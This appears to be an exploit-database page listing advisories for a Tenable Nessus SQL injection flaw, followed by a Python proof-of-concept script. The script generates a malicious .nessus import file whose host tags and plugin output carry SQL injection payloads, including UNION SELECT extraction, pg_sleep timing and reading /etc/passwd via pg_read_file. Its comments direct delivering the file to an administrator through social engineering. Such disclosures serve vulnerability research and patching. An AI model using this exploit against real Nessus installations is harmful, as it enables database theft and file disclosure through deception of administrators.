| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2026-57588 | 25 Jun 202613:47 | ā | attackerkb | |
| CVE-2026-57588 | 26 Jun 202614:40 | ā | circl | |
| CVE-2026-57588 | 25 Jun 202613:47 | ā | cve | |
| CVE-2026-57588 SQL Injection in Nessus via Malicious Scan Result File Import | 25 Jun 202613:47 | ā | cvelist | |
| Tenable Nessus 10.12.1 - SQL Injection | 7 Jul 202600:00 | ā | exploitdb | |
| EUVD-2026-39409 | 25 Jun 202613:47 | ā | euvd | |
| Tenable Nessus < 10.12.1 Multiple Vulnerabilities (TNS-2026-17) | 26 Jun 202600:00 | ā | nessus | |
| CVE-2026-57588 | 25 Jun 202615:16 | ā | nvd | |
| PT-2026-52459 | 25 Jun 202600:00 | ā | ptsecurity | |
| CVE-2026-57588 SQL Injection in Nessus via Malicious Scan Result File Import | 25 Jun 202613:47 | ā | vulnrichment |
# Exploit Title: Tenable Nessus 10.12.1 - SQL Injection
# CVE: CVE-2026-57588
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://www.tenable.com
# Software Link: https://www.tenable.com/downloads/nessus
# Affected: Nessus 10.12.0 and prior
# Tested on: Nessus 10.12.0
# Category: Remote
# Platform: Linux / Windows
# Exploit Type: SQL Injection
# CVSS: 4.3 (Medium)
# Description: A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML).
# Successful exploitation allows data exfiltration from the backend database by a privileged user.
# Fixed in: Nessus 10.12.1 and later
# Usage:
# python3 exploit.py -o malicious.nessus
#
# Examples:
# python3 exploit.py
# python3 exploit.py --output poc.nessus
#
# Options:
# -o, --output Output filename for the malicious .nessus file
#
# Notes:
# ⢠This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
# ⢠Works best against PostgreSQL backend (default in Nessus).
#
# How to Use
#
# Step 1:
# Generate the malicious file using this script.
#
# Step 2:
# Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.
def banner():
print(r"""
āāāāāāāā āāāāāā āāāā āāāāāā āāā āāāāāā āāāā āāāāāāāāāāāāāāāāāāāā
āāāāāāāāāāāāāāāāāāāāāā āāāāāāā āāāāāāāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāā
āāāāāāāāāāāāāāāāāāāāāāā āāā āāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāā
āāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāā āāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāā
āāāāāāāāāāāā āāāāāā āāāāāā āāā āāā āāāāāā āāā āāāāāāāāāāāāāā āāā
āāāāāāā āāā āāāāāā āāāāā āāā āāā āāāāāā āāāāāāāāāāāāāā āāā
āāā Banyamer Security āāā
""")
import argparse
import xml.etree.ElementTree as ET
def create_malicious_nessus(output_file):
root = ET.Element("NessusClientData_v2")
report = ET.SubElement(root, "Report")
report.set("name", "PoC - CVE-2026-57588")
host = ET.SubElement(report, "ReportHost")
host.set("name", "poc-target.example.com")
host_properties = ET.SubElement(host, "HostProperties")
tags = [
("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
("ip", "192.168.1.1' OR '1'='1"),
("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
]
for name, value in tags:
tag = ET.SubElement(host_properties, "tag")
tag.set("name", name)
tag.text = value
item = ET.SubElement(host, "ReportItem")
ET.SubElement(item, "pluginID").text = "999999"
ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
ET.SubElement(item, "port").text = "0"
ET.SubElement(item, "protocol").text = "tcp"
ET.SubElement(item, "severity").text = "0"
ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
plugin_output = ET.SubElement(item, "plugin_output")
plugin_output.text = """Normal output
' UNION ALL SELECT
'=== DATA EXFIL START ===',
table_name,
column_name,
'=== DATA EXFIL END ==='
FROM information_schema.columns
WHERE table_schema = current_schema() -- """
tree = ET.ElementTree(root)
with open(output_file, "wb") as f:
tree.write(f, encoding="utf-8", xml_declaration=True)
print(f"[+] Malicious file successfully created: {output_file}")
print("[+] Deliver this file to a privileged Nessus user for import.")
def main():
banner()
parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
args = parser.parse_args()
create_malicious_nessus(args.output)
if __name__ == "__main__":
main()Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation